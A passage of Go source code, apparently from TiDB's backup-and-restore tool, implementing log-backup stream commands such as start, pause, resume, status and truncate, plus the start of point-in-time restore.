flagStreamTaskName = "task-name"
flagStreamStartTS = "start-ts"
flagStreamEndTS = "end-ts"
flagGCSafePointTTS = "gc-ttl"
)
var (
StreamStart = "log start"
StreamStop = "log stop"
StreamPause = "log pause"
StreamResume = "log resume"
StreamStatus = "log status"
StreamTruncate = "log truncate"
StreamMetadata = "log metadata"
StreamCtl = "log ctl"
skipSummaryCommandList = map[string]struct{}{
StreamStatus: {},
StreamTruncate: {},
}
// rawKVBatchCount specifies the count of entries that the rawkv client puts into TiKV.
rawKVBatchCount = 64
streamShiftDuration = time.Hour
)
var StreamCommandMap = map[string]func(c context.Context, g glue.Glue, cmdName string, cfg *StreamConfig) error{
StreamStart: RunStreamStart,
StreamStop: RunStreamStop,
StreamPause: RunStreamPause,
StreamResume: RunStreamResume,
StreamStatus: RunStreamStatus,
StreamTruncate: RunStreamTruncate,
StreamMetadata: RunStreamMetadata,
StreamCtl: RunStreamAdvancer,
}
// StreamConfig specifies the configure about backup stream
type StreamConfig struct {
Config
TaskName string `json:"task-name" toml:"task-name"`
// StartTS usually equals the tso of full-backup, but user can reset it
StartTS uint64 `json:"start-ts" toml:"start-ts"`
EndTS uint64 `json:"end-ts" toml:"end-ts"`
// SafePointTTL ensures TiKV can scan entries not being GC at [startTS, currentTS]
SafePointTTL int64 `json:"safe-point-ttl" toml:"safe-point-ttl"`
// Spec for the command `truncate`, we should truncate the until when?
Until uint64 `json:"until" toml:"until"`
DryRun bool `json:"dry-run" toml:"dry-run"`
SkipPrompt bool `json:"skip-prompt" toml:"skip-prompt"`
// Spec for the command `status`.
JSONOutput bool `json:"json-output" toml:"json-output"`
// Spec for the command `advancer`.
AdvancerCfg advancercfg.Config `json:"advancer-config" toml:"advancer-config"`
}
func (cfg *StreamConfig) makeStorage(ctx context.Context) (storage.ExternalStorage, error) {
u, err := storage.ParseBackend(cfg.Storage, &cfg.BackendOptions)
if err != nil {
return nil, errors.Trace(err)
}
opts := storage.ExternalStorageOptions{
NoCredentials: cfg.NoCreds,
SendCredentials: cfg.SendCreds,
HTTPClient: storage.GetDefaultHttpClient(cfg.MetadataDownloadBatchSize),
}
storage, err := storage.New(ctx, u, &opts)
if err != nil {
return nil, errors.Trace(err)
}
return storage, nil
}
// DefineStreamStartFlags defines flags used for `stream start`
func DefineStreamStartFlags(flags *pflag.FlagSet) {
DefineStreamCommonFlags(flags)
flags.String(flagStreamStartTS, "",
"usually equals last full backupTS, used for backup log. Default value is current ts.\n"+
"support TSO or datetime, e.g. '400036290571534337' or '2018-05-11 01:42:23+0800'.")
// 999999999999999999 means 2090-11-18 22:07:45
flags.String(flagStreamEndTS, "999999999999999999", "end ts, indicate stopping observe after endTS"+
"support TSO or datetime")
_ = flags.MarkHidden(flagStreamEndTS)
flags.Int64(flagGCSafePointTTS, utils.DefaultStreamStartSafePointTTL,
"the TTL (in seconds) that PD holds for BR's GC safepoint")
_ = flags.MarkHidden(flagGCSafePointTTS)
}
func DefineStreamPauseFlags(flags *pflag.FlagSet) {
DefineStreamCommonFlags(flags)
flags.Int64(flagGCSafePointTTS, utils.DefaultStreamPauseSafePointTTL,
"the TTL (in seconds) that PD holds for BR's GC safepoint")
}
// DefineStreamCommonFlags define common flags for `stream task`
func DefineStreamCommonFlags(flags *pflag.FlagSet) {
flags.String(flagStreamTaskName, "", "The task name for the backup log task.")
}
func DefineStreamStatusCommonFlags(flags *pflag.FlagSet) {
flags.String(flagStreamTaskName, stream.WildCard,
"The task name for backup stream log. If default, get status of all of tasks",
)
flags.Bool(flagStreamJSONOutput, false,
"Print JSON as the output.",
)
}
func DefineStreamTruncateLogFlags(flags *pflag.FlagSet) {
flags.String(flagUntil, "", "Remove all backup data until this TS."+
"(support TSO or datetime, e.g. '400036290571534337' or '2018-05-11 01:42:23+0800'.)")
flags.Bool(flagDryRun, false, "Run the command but don't really delete the files.")
flags.BoolP(flagYes, "y", false, "Skip all prompts and always execute the command.")
}
func (cfg *StreamConfig) ParseStreamStatusFromFlags(flags *pflag.FlagSet) error {
var err error
cfg.JSONOutput, err = flags.GetBool(flagStreamJSONOutput)
if err != nil {
return errors.Trace(err)
}
if err = cfg.ParseStreamCommonFromFlags(flags); err != nil {
return errors.Trace(err)
}
return nil
}
func (cfg *StreamConfig) ParseStreamTruncateFromFlags(flags *pflag.FlagSet) error {
tsString, err := flags.GetString(flagUntil)
if err != nil {
return errors.Trace(err)
}
if cfg.Until, err = ParseTSString(tsString, true); err != nil {
return errors.Trace(err)
}
if cfg.SkipPrompt, err = flags.GetBool(flagYes); err != nil {
return errors.Trace(err)
}
if cfg.DryRun, err = flags.GetBool(flagDryRun); err != nil {
return errors.Trace(err)
}
return nil
}
// ParseStreamStartFromFlags parse parameters for `stream start`
func (cfg *StreamConfig) ParseStreamStartFromFlags(flags *pflag.FlagSet) error {
err := cfg.ParseStreamCommonFromFlags(flags)
if err != nil {
return errors.Trace(err)
}
tsString, err := flags.GetString(flagStreamStartTS)
if err != nil {
return errors.Trace(err)
}
if cfg.StartTS, err = ParseTSString(tsString, true); err != nil {
return errors.Trace(err)
}
tsString, err = flags.GetString(flagStreamEndTS)
if err != nil {
return errors.Trace(err)
}
if cfg.EndTS, err = ParseTSString(tsString, true); err != nil {
return errors.Trace(err)
}
if cfg.SafePointTTL, err = flags.GetInt64(flagGCSafePointTTS); err != nil {
return errors.Trace(err)
}
if cfg.SafePointTTL <= 0 {
cfg.SafePointTTL = utils.DefaultStreamStartSafePointTTL
}
return nil
}
// ParseStreamPauseFromFlags parse parameters for `stream pause`
func (cfg *StreamConfig) ParseStreamPauseFromFlags(flags *pflag.FlagSet) error {
err := cfg.ParseStreamCommonFromFlags(flags)
if err != nil {
return errors.Trace(err)
}
if cfg.SafePointTTL, err = flags.GetInt64(flagGCSafePointTTS); err != nil {
return errors.Trace(err)
}
if cfg.SafePointTTL <= 0 {
cfg.SafePointTTL = utils.DefaultStreamPauseSafePointTTL
}
return nil
}
// ParseStreamCommonFromFlags parse parameters for `stream task`
func (cfg *StreamConfig) ParseStreamCommonFromFlags(flags *pflag.FlagSet) error {
var err error
cfg.TaskName, err = flags.GetString(flagStreamTaskName)
if err != nil {
return errors.Trace(err)
}
if len(cfg.TaskName) <= 0 {
return errors.Annotate(berrors.ErrInvalidArgument, "Miss parameters task-name")
}
return nil
}
type streamMgr struct {
cfg *StreamConfig
mgr *conn.Mgr
bc *backup.Client
httpCli *http.Client
}
func NewStreamMgr(ctx context.Context, cfg *StreamConfig, g glue.Glue, isStreamStart bool) (*streamMgr, error) {
mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
cfg.CheckRequirements, true, conn.StreamVersionChecker)
if err != nil {
return nil, errors.Trace(err)
}
defer func() {
if err != nil {
mgr.Close()
}
}()
// just stream start need Storage
s := &streamMgr{
cfg: cfg,
mgr: mgr,
}
if isStreamStart {
client := backup.NewBackupClient(ctx, mgr)
backend, err := storage.ParseBackend(cfg.Storage, &cfg.BackendOptions)
if err != nil {
return nil, errors.Trace(err)
}
opts := storage.ExternalStorageOptions{
NoCredentials: cfg.NoCreds,
SendCredentials: cfg.SendCreds,
}
if err = client.SetStorage(ctx, backend, &opts); err != nil {
return nil, errors.Trace(err)
}
s.bc = client
// create http client to do some requirements check.
s.httpCli = httputil.NewClient(mgr.GetTLSConfig())
}
return s, nil
}
func (s *streamMgr) close() {
s.mgr.Close()
}
func (s *streamMgr) checkLock(ctx context.Context) (bool, error) {
return s.bc.GetStorage().FileExists(ctx, metautil.LockFile)
}
func (s *streamMgr) setLock(ctx context.Context) error {
return s.bc.SetLockFile(ctx)
}
// adjustAndCheckStartTS checks that startTS should be smaller than currentTS,
// and endTS is larger than currentTS.
func (s *streamMgr) adjustAndCheckStartTS(ctx context.Context) error {
currentTS, err := s.mgr.GetTS(ctx)
if err != nil {
return errors.Trace(err)
}
// set currentTS to startTS as a default value
if s.cfg.StartTS == 0 {
s.cfg.StartTS = currentTS
}
if currentTS < s.cfg.StartTS {
return errors.Annotatef(berrors.ErrInvalidArgument,
"invalid timestamps, startTS %d should be smaller than currentTS %d",
s.cfg.StartTS, currentTS)
}
if s.cfg.EndTS <= currentTS {
return errors.Annotatef(berrors.ErrInvalidArgument,
"invalid timestamps, endTS %d should be larger than currentTS %d",
s.cfg.EndTS, currentTS)
}
return nil
}
// checkImportTaskRunning checks whether there is any import task running.
func (s *streamMgr) checkImportTaskRunning(ctx context.Context) error {
list, err := utils.GetImportTasksFrom(ctx, s.mgr.GetDomain().GetEtcdClient())
if err != nil {
return errors.Trace(err)
}
if !list.Empty() {
return errors.Errorf("There are some lightning/restore tasks running: %s"+
"please stop or wait finishing at first. "+
"If the lightning/restore task is forced to terminate by system, "+
"please wait for ttl to decrease to 0.", list.MessageToUser())
}
return nil
}
// setGCSafePoint sets the server safe point to PD.
func (s *streamMgr) setGCSafePoint(ctx context.Context, sp utils.BRServiceSafePoint) error {
err := utils.CheckGCSafePoint(ctx, s.mgr.GetPDClient(), sp.BackupTS)
if err != nil {
return errors.Annotatef(err,
"failed to check gc safePoint, ts %v", sp.BackupTS)
}
err = utils.UpdateServiceSafePoint(ctx, s.mgr.GetPDClient(), sp)
if err != nil {
return errors.Trace(err)
}
log.Info("set stream safePoint", zap.Object("safePoint", sp))
return nil
}
func (s *streamMgr) buildObserveRanges(ctx context.Context) ([]kv.KeyRange, error) {
dRanges, err := stream.BuildObserveDataRanges(
s.mgr.GetStorage(),
s.cfg.FilterStr,
s.cfg.TableFilter,
s.cfg.StartTS,
)
if err != nil {
return nil, errors.Trace(err)
}
mRange := stream.BuildObserveMetaRange()
rs := append([]kv.KeyRange{*mRange}, dRanges...)
slices.SortFunc(rs, func(i, j kv.KeyRange) int {
return bytes.Compare(i.StartKey, j.StartKey)
})
return rs, nil
}
func (s *streamMgr) backupFullSchemas(ctx context.Context, g glue.Glue) error {
clusterVersion, err := s.mgr.GetClusterVersion(ctx)
if err != nil {
return errors.Trace(err)
}
metaWriter := metautil.NewMetaWriter(s.bc.GetStorage(), metautil.MetaFileSize, false, metautil.MetaFile, nil)
metaWriter.Update(func(m *backuppb.BackupMeta) {
// save log startTS to backupmeta file
m.StartVersion = s.cfg.StartTS
m.ClusterId = s.bc.GetClusterID()
m.ClusterVersion = clusterVersion
})
schemas := backup.NewBackupSchemas(func(storage kv.Storage, fn func(*model.DBInfo, *model.TableInfo)) error {
return backup.BuildFullSchema(storage, s.cfg.StartTS, func(dbInfo *model.DBInfo, tableInfo *model.TableInfo) {
fn(dbInfo, tableInfo)
})
}, 0)
err = schemas.BackupSchemas(ctx, metaWriter, nil, s.mgr.GetStorage(), nil,
s.cfg.StartTS, backup.DefaultSchemaConcurrency, 0, true, nil)
if err != nil {
return errors.Trace(err)
}
if err = metaWriter.FlushBackupMeta(ctx); err != nil {
return errors.Trace(err)
}
return nil
}
func (s *streamMgr) checkStreamStartEnable(g glue.Glue) error {
se, err := g.CreateSession(s.mgr.GetStorage())
if err != nil {
return errors.Trace(err)
}
execCtx := se.GetSessionCtx().(sqlexec.RestrictedSQLExecutor)
supportStream, err := utils.IsLogBackupEnabled(execCtx)
if err != nil {
return errors.Trace(err)
}
if !supportStream {
return errors.New("Unable to create task about log-backup. " +
"please set TiKV config `log-backup.enable` to true and restart TiKVs.")
}
if !ddl.IngestJobsNotExisted(se.GetSessionCtx()) {
return errors.Annotate(berrors.ErrUnknown,
"Unable to create log backup task. Please wait until the DDL jobs(add index with ingest method) are finished.")
}
return nil
}
type RestoreFunc func(string) error
// KeepGcDisabled keeps GC disabled and return a function that used to gc enabled.
// gc.ratio-threshold = "-1.0", which represents disable gc in TiKV.
func KeepGcDisabled(g glue.Glue, store kv.Storage) (RestoreFunc, string, error) {
se, err := g.CreateSession(store)
if err != nil {
return nil, "", errors.Trace(err)
}
execCtx := se.GetSessionCtx().(sqlexec.RestrictedSQLExecutor)
oldRatio, err := utils.GetGcRatio(execCtx)
if err != nil {
return nil, "", errors.Trace(err)
}
newRatio := "-1.0"
err = utils.SetGcRatio(execCtx, newRatio)
if err != nil {
return nil, "", errors.Trace(err)
}
// If the oldRatio is negative, which is not normal status.
// It should set default value "1.1" after PiTR finished.
if strings.HasPrefix(oldRatio, "-") {
oldRatio = utils.DefaultGcRatioVal
}
return func(ratio string) error {
return utils.SetGcRatio(execCtx, ratio)
}, oldRatio, nil
}
// RunStreamCommand run all kinds of `stream task`
func RunStreamCommand(
ctx context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
cfg.Config.adjust()
defer func() {
if _, ok := skipSummaryCommandList[cmdName]; !ok {
summary.Summary(cmdName)
}
}()
commandFn, exist := StreamCommandMap[cmdName]
if !exist {
return errors.Annotatef(berrors.ErrInvalidArgument, "invalid command %s", cmdName)
}
if err := commandFn(ctx, g, cmdName, cfg); err != nil {
log.Error("failed to stream", zap.String("command", cmdName), zap.Error(err))
summary.SetSuccessStatus(false)
summary.CollectFailureUnit(cmdName, err)
return err
}
summary.SetSuccessStatus(true)
return nil
}
// RunStreamStart specifies starting a stream task
func RunStreamStart(
c context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan("task.RunStreamStart", opentracing.ChildOf(span.Context()))
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
streamMgr, err := NewStreamMgr(ctx, cfg, g, true)
if err != nil {
return errors.Trace(err)
}
defer streamMgr.close()
if err = streamMgr.checkStreamStartEnable(g); err != nil {
return errors.Trace(err)
}
if err = streamMgr.adjustAndCheckStartTS(ctx); err != nil {
return errors.Trace(err)
}
if err = streamMgr.checkImportTaskRunning(ctx); err != nil {
return errors.Trace(err)
}
cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
// It supports single stream log task currently.
if count, err := cli.GetTaskCount(ctx); err != nil {
return errors.Trace(err)
} else if count > 0 {
return errors.Annotate(berrors.ErrStreamLogTaskExist, "It supports single stream log task currently")
}
exist, err := streamMgr.checkLock(ctx)
if err != nil {
return errors.Trace(err)
}
// exist is true, which represents restart a stream task. Or create a new stream task.
if exist {
logInfo, err := getLogRange(ctx, &cfg.Config)
if err != nil {
return errors.Trace(err)
}
if logInfo.clusterID > 0 && logInfo.clusterID != streamMgr.bc.GetClusterID() {
return errors.Annotatef(berrors.ErrInvalidArgument,
"the stream log files from cluster ID:%v and current cluster ID:%v ",
logInfo.clusterID, streamMgr.bc.GetClusterID())
}
cfg.StartTS = logInfo.logMaxTS
if err = streamMgr.setGCSafePoint(
ctx,
utils.BRServiceSafePoint{
ID: utils.MakeSafePointID(),
TTL: cfg.SafePointTTL,
BackupTS: cfg.StartTS,
},
); err != nil {
return errors.Trace(err)
}
} else {
if err = streamMgr.setGCSafePoint(
ctx,
utils.BRServiceSafePoint{
ID: utils.MakeSafePointID(),
TTL: cfg.SafePointTTL,
BackupTS: cfg.StartTS,
},
); err != nil {
return errors.Trace(err)
}
if err = streamMgr.setLock(ctx); err != nil {
return errors.Trace(err)
}
if err = streamMgr.backupFullSchemas(ctx, g); err != nil {
return errors.Trace(err)
}
}
ranges, err := streamMgr.buildObserveRanges(ctx)
if err != nil {
return errors.Trace(err)
} else if len(ranges) == 0 {
// nothing to backup
pdAddress := strings.Join(cfg.PD, ",")
log.Warn("Nothing to observe, maybe connected to cluster for restoring",
zap.String("PD address", pdAddress))
return errors.Annotate(berrors.ErrInvalidArgument, "nothing need to observe")
}
ti := streamhelper.TaskInfo{
PBInfo: backuppb.StreamBackupTaskInfo{
Storage: streamMgr.bc.GetStorageBackend(),
StartTs: cfg.StartTS,
EndTs: cfg.EndTS,
Name: cfg.TaskName,
TableFilter: cfg.FilterStr,
CompressionType: backuppb.CompressionType_ZSTD,
},
Ranges: ranges,
Pausing: false,
}
if err = cli.PutTask(ctx, ti); err != nil {
return errors.Trace(err)
}
summary.Log(cmdName, ti.ZapTaskInfo()...)
return nil
}
func RunStreamMetadata(
c context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"task.RunStreamCheckLog",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
logInfo, err := getLogRange(ctx, &cfg.Config)
if err != nil {
return errors.Trace(err)
}
logMinDate := stream.FormatDate(oracle.GetTimeFromTS(logInfo.logMinTS))
logMaxDate := stream.FormatDate(oracle.GetTimeFromTS(logInfo.logMaxTS))
summary.Log(cmdName, zap.Uint64("log-min-ts", logInfo.logMinTS),
zap.String("log-min-date", logMinDate),
zap.Uint64("log-max-ts", logInfo.logMaxTS),
zap.String("log-max-date", logMaxDate),
)
return nil
}
// RunStreamStop specifies stoping a stream task
func RunStreamStop(
c context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"task.RunStreamStop",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
streamMgr, err := NewStreamMgr(ctx, cfg, g, false)
if err != nil {
return errors.Trace(err)
}
defer streamMgr.close()
cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
// to add backoff
ti, err := cli.GetTask(ctx, cfg.TaskName)
if err != nil {
return errors.Trace(err)
}
if err = cli.DeleteTask(ctx, cfg.TaskName); err != nil {
return errors.Trace(err)
}
if err := streamMgr.setGCSafePoint(ctx,
utils.BRServiceSafePoint{
ID: buildPauseSafePointName(ti.Info.Name),
TTL: utils.DefaultStreamStartSafePointTTL,
BackupTS: 0,
},
); err != nil {
log.Warn("failed to remove safe point", zap.String("error", err.Error()))
}
summary.Log(cmdName, logutil.StreamBackupTaskInfo(&ti.Info))
return nil
}
// RunStreamPause specifies pausing a stream task.
func RunStreamPause(
c context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"task.RunStreamPause",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
streamMgr, err := NewStreamMgr(ctx, cfg, g, false)
if err != nil {
return errors.Trace(err)
}
defer streamMgr.close()
cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
// to add backoff
ti, isPaused, err := cli.GetTaskWithPauseStatus(ctx, cfg.TaskName)
if err != nil {
return errors.Trace(err)
} else if isPaused {
return errors.Annotatef(berrors.ErrKVUnknown, "The task %s is paused already.", cfg.TaskName)
}
globalCheckPointTS, err := ti.GetGlobalCheckPointTS(ctx)
if err != nil {
return errors.Trace(err)
}
if err = streamMgr.setGCSafePoint(
ctx,
utils.BRServiceSafePoint{
ID: buildPauseSafePointName(ti.Info.Name),
TTL: cfg.SafePointTTL,
BackupTS: globalCheckPointTS,
},
); err != nil {
return errors.Trace(err)
}
err = cli.PauseTask(ctx, cfg.TaskName)
if err != nil {
return errors.Trace(err)
}
summary.Log(cmdName, logutil.StreamBackupTaskInfo(&ti.Info))
return nil
}
// RunStreamResume specifies resuming a stream task.
func RunStreamResume(
c context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"task.RunStreamResume",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
streamMgr, err := NewStreamMgr(ctx, cfg, g, false)
if err != nil {
return errors.Trace(err)
}
defer streamMgr.close()
cli := streamhelper.NewMetaDataClient(streamMgr.mgr.GetDomain().GetEtcdClient())
// to add backoff
ti, isPaused, err := cli.GetTaskWithPauseStatus(ctx, cfg.TaskName)
if err != nil {
return errors.Trace(err)
} else if !isPaused {
return errors.Annotatef(berrors.ErrKVUnknown,
"The task %s is active already.", cfg.TaskName)
}
globalCheckPointTS, err := ti.GetGlobalCheckPointTS(ctx)
if err != nil {
return errors.Trace(err)
}
err = utils.CheckGCSafePoint(ctx, streamMgr.mgr.GetPDClient(), globalCheckPointTS)
if err != nil {
return errors.Annotatef(err, "the global checkpoint ts: %v(%s) has been gc. ",
globalCheckPointTS, oracle.GetTimeFromTS(globalCheckPointTS))
}
err = cli.ResumeTask(ctx, cfg.TaskName)
if err != nil {
return errors.Trace(err)
}
err = cli.CleanLastErrorOfTask(ctx, cfg.TaskName)
if err != nil {
return err
}
if err := streamMgr.setGCSafePoint(ctx,
utils.BRServiceSafePoint{
ID: buildPauseSafePointName(ti.Info.Name),
TTL: utils.DefaultStreamStartSafePointTTL,
BackupTS: globalCheckPointTS,
},
); err != nil {
log.Warn("failed to remove safe point",
zap.Uint64("safe-point", globalCheckPointTS), zap.String("error", err.Error()))
}
summary.Log(cmdName, logutil.StreamBackupTaskInfo(&ti.Info))
return nil
}
func RunStreamAdvancer(c context.Context, g glue.Glue, cmdName string, cfg *StreamConfig) error {
ctx, cancel := context.WithCancel(c)
defer cancel()
mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
cfg.CheckRequirements, false, conn.StreamVersionChecker)
if err != nil {
return err
}
etcdCLI, err := dialEtcdWithCfg(ctx, cfg.Config)
if err != nil {
return err
}
env := streamhelper.CliEnv(mgr.StoreManager, etcdCLI)
advancer := streamhelper.NewCheckpointAdvancer(env)
advancer.UpdateConfig(cfg.AdvancerCfg)
advancerd := daemon.New(advancer, streamhelper.OwnerManagerForLogBackup(ctx, etcdCLI), cfg.AdvancerCfg.TickDuration)
loop, err := advancerd.Begin(ctx)
if err != nil {
return err
}
loop()
return nil
}
func checkConfigForStatus(pd []string) error {
if len(pd) == 0 {
return errors.Annotatef(berrors.ErrInvalidArgument,
"the command needs access to PD, please specify `-u` or `--pd`")
}
return nil
}
// makeStatusController makes the status controller via some config.
// this should better be in the `stream` package but it is impossible because of cyclic requirements.
func makeStatusController(ctx context.Context, cfg *StreamConfig, g glue.Glue) (*stream.StatusController, error) {
console := glue.GetConsole(g)
etcdCLI, err := dialEtcdWithCfg(ctx, cfg.Config)
if err != nil {
return nil, err
}
cli := streamhelper.NewMetaDataClient(etcdCLI)
var printer stream.TaskPrinter
if !cfg.JSONOutput {
printer = stream.PrintTaskByTable(console)
} else {
printer = stream.PrintTaskWithJSON(console)
}
mgr, err := NewMgr(ctx, g, cfg.PD, cfg.TLS, GetKeepalive(&cfg.Config),
cfg.CheckRequirements, false, conn.StreamVersionChecker)
if err != nil {
return nil, err
}
return stream.NewStatusController(cli, mgr, printer), nil
}
// RunStreamStatus get status for a specific stream task
func RunStreamStatus(
c context.Context,
g glue.Glue,
cmdName string,
cfg *StreamConfig,
) error {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan(
"task.RunStreamStatus",
opentracing.ChildOf(span.Context()),
)
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
if err := checkConfigForStatus(cfg.PD); err != nil {
return err
}
ctl, err := makeStatusController(ctx, cfg, g)
if err != nil {
return err
}
return ctl.PrintStatusOfTask(ctx, cfg.TaskName)
}
// RunStreamTruncate truncates the log that belong to (0, until-ts)
func RunStreamTruncate(c context.Context, g glue.Glue, cmdName string, cfg *StreamConfig) error {
console := glue.GetConsole(g)
em := color.New(color.Bold).SprintFunc()
warn := color.New(color.Bold, color.FgHiRed).SprintFunc()
formatTS := func(ts uint64) string {
return oracle.GetTimeFromTS(ts).Format("2006-01-02 15:04:05.0000")
}
if cfg.Until == 0 {
return errors.Annotatef(berrors.ErrInvalidArgument, "please provide the `--until` ts")
}
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
storage, err := cfg.makeStorage(ctx)
if err != nil {
return err
}
sp, err := restore.GetTSFromFile(ctx, storage, restore.TruncateSafePointFileName)
if err != nil {
return err
}
if cfg.Until < sp {
console.Println("According to the log, you have truncated backup data before", em(formatTS(sp)))
if !cfg.SkipPrompt && !console.PromptBool("Continue? ") {
return nil
}
}
readMetaDone := console.ShowTask("Reading Metadata... ", glue.WithTimeCost())
metas := restore.StreamMetadataSet{
MetadataDownloadBatchSize: cfg.MetadataDownloadBatchSize,
Helper: stream.NewMetadataHelper(),
DryRun: cfg.DryRun,
}
shiftUntilTS, err := metas.LoadUntilAndCalculateShiftTS(ctx, storage, cfg.Until)
if err != nil {
return err
}
readMetaDone()
var (
fileCount int = 0
kvCount int64 = 0
totalSize uint64 = 0
)
metas.IterateFilesFullyBefore(shiftUntilTS, func(d *restore.FileGroupInfo) (shouldBreak bool) {
fileCount++
totalSize += d.Length
kvCount += d.KVCount
return
})
console.Printf("We are going to remove %s files, until %s.\n",
em(fileCount),
em(formatTS(cfg.Until)),
)
if !cfg.SkipPrompt && !console.PromptBool(warn("Sure? ")) {
return nil
}
if cfg.Until > sp && !cfg.DryRun {
if err := restore.SetTSToFile(
ctx, storage, cfg.Until, restore.TruncateSafePointFileName); err != nil {
return err
}
}
// begin to remove
p := console.StartProgressBar(
"Clearing Data Files and Metadata", fileCount,
glue.WithTimeCost(),
glue.WithConstExtraField("kv-count", kvCount),
glue.WithConstExtraField("kv-size", fmt.Sprintf("%d(%s)", totalSize, units.HumanSize(float64(totalSize)))),
)
defer p.Close()
notDeleted, err := metas.RemoveDataFilesAndUpdateMetadataInBatch(ctx, shiftUntilTS, storage, p.IncBy)
if err != nil {
return err
}
if err := p.Wait(ctx); err != nil {
return err
}
if len(notDeleted) > 0 {
const keepFirstNFailure = 16
console.Println("Files below are not deleted due to error, you may clear it manually, check log for detail error:")
console.Println("- Total", em(len(notDeleted)), "items.")
if len(notDeleted) > keepFirstNFailure {
console.Println("-", em(len(notDeleted)-keepFirstNFailure), "items omitted.")
// TODO: maybe don't add them at the very first.
notDeleted = notDeleted[:keepFirstNFailure]
}
for _, f := range notDeleted {
console.Println(f)
}
}
return nil
}
// checkTaskExists checks whether there is a log backup task running.
// If so, return an error.
func checkTaskExists(ctx context.Context, cfg *RestoreConfig, etcdCLI *clientv3.Client) error {
if err := checkConfigForStatus(cfg.PD); err != nil {
return err
}
cli := streamhelper.NewMetaDataClient(etcdCLI)
// check log backup task
tasks, err := cli.GetAllTasks(ctx)
if err != nil {
return err
}
if len(tasks) > 0 {
return errors.Errorf("log backup task is running: %s, "+
"please stop the task before restore, and after PITR operation finished, "+
"create log-backup task again and create a full backup on this cluster", tasks[0].Info.Name)
}
// check cdc changefeed
nameSet, err := utils.GetCDCChangefeedNameSet(ctx, etcdCLI)
if err != nil {
return err
}
if !nameSet.Empty() {
return errors.Errorf("%splease stop changefeed(s) before restore", nameSet.MessageToUser())
}
return nil
}
// RunStreamRestore restores stream log.
func RunStreamRestore(
c context.Context,
g glue.Glue,
cmdName string,
cfg *RestoreConfig,
) (err error) {
ctx, cancelFn := context.WithCancel(c)
defer cancelFn()
if span := opentracing.SpanFromContext(ctx); span != nil && span.Tracer() != nil {
span1 := span.Tracer().StartSpan("task.RunStreamRestore", opentracing.ChildOf(span.Context()))
defer span1.Finish()
ctx = opentracing.ContextWithSpan(ctx, span1)
}
_, s, err := GetStorage(ctx, cfg.Config.Storage, &cfg.Config)
if err != nil {
return errors.Trace(err)
}
logInfo, err := getLogRangeWithStorage(ctx, &cfg.Config, s)
if err != nil {
return errors.Trace(err)
}
if cfg.RestoreTS == 0 {
cfg.RestoreTS = logInfo.logMaxTS
}
if len(cfg.FullBackupStorage) > 0 {
startTS, fullClusterID, err := getFullBackupTS(ctx, cfg)
if err != nil {
return errors.Trace(err)
}
if logInfo.clusterID > 0 && fullClusterID > 0 && logInfo.clusterID != fullClusterID {
return errors.Annotatef(berrors.ErrInvalidArgument,
"the full snapshot(from cluster ID:%v) and log(from cluster ID:%v) come from different cluster.",
fullClusterID, logInfo.clusterID)
}
cfg.StartTS = startTS
if cfg.StartTS < logInfo.logMinTS {
return errors.Annotatef(berrors.ErrInvalidArgument,
"it has gap between full backup ts:%d(%s) and log backup ts:%d(%s). ",
cfg.StartTS, oracle.GetTimeFromTS(cfg.StartTS),
logInfo.logMinTS, oracle.GetTimeFromTS(logInfo.logMinTS))
}
}
log.Info("start restore on point",
zap.Uint64("restore-from", cfg.StartTS), zap.Uint64("restore-to", cfg.RestoreTS),
zap.Uint64("log-min-ts", logInfo.logMinTS), zap.Uint64("log-max-ts", logInfo.logMaxTS))
if err := checkLogRange(cfg.StartTS, cfg.RestoreTS, logInfo.logMinTS, logInfo.logMaxTS); err != nil {
return errors.Trace(err)
}
curTaskInfo, doFullRestore, err := checkPiTRTaskInfo(ctx, g, s, cfg)
if err != nil {
return errors.Trace(err)
}
failpoint.Inject("failed-before-full-restore", func(_ failpoint.Value) {
failpoint.Return(errors.New("failpoint: failed before full restore"))
})
recorder := tiflashrec.New()
cfg.tiflashRecorder = recorder
// restore full snapshot.
if doFullRestore {
logStorage := cfg.Config.Storage
cfg.Config.Storage = cfg.FullBackupStorage
// TiFlash replica is restored to down-stream on 'pitr' currently.
if err = runRestore(ctx, g, FullRestoreCmd, cfg); err != nil {
